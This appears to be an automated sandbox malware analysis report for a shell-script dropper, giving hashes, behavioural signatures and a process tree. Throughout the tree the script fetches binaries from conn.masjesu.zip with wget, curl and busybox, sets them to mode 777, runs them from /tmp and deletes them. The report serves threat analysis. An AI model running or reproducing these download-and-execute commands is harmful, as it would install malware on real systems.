Analysis
-
max time kernel
103s -
max time network
133s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
-
Size
10KB
-
MD5
3ef72a961095a0472a5f608928d2c772
-
SHA1
dc7795456334779680f17d1fd318e7026431bbcc
-
SHA256
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2
-
SHA512
2deda53f3c8abdc9a80c6dccb0cdbf3e089b0f1e8a36747d4a07db5b4c153cfaa6a3e4ee1372ed7319b9b560faf35002fdbcca1033261b85ade67f2b68484c4a
-
SSDEEP
192:u7XDK1NRwo+TE7aAAfGXsQNqi3Ey0AAfGHsQNqiGXDK1NJ:u7XDK1NRwo+o7aAAfGFEtAAfGMXDK1NJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading /proc/sys/crypto/fips_enabled (Process: curl; entry repeated) -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:714
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:761
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:762
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:776
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:786
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:787
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:809
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:893
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:921
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:935
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:942
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:949
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:977
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:991
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:1005
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:1006
-
-
